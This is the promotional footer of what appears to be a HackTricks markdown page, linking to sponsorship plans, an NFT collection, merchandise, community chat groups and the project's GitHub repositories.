* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|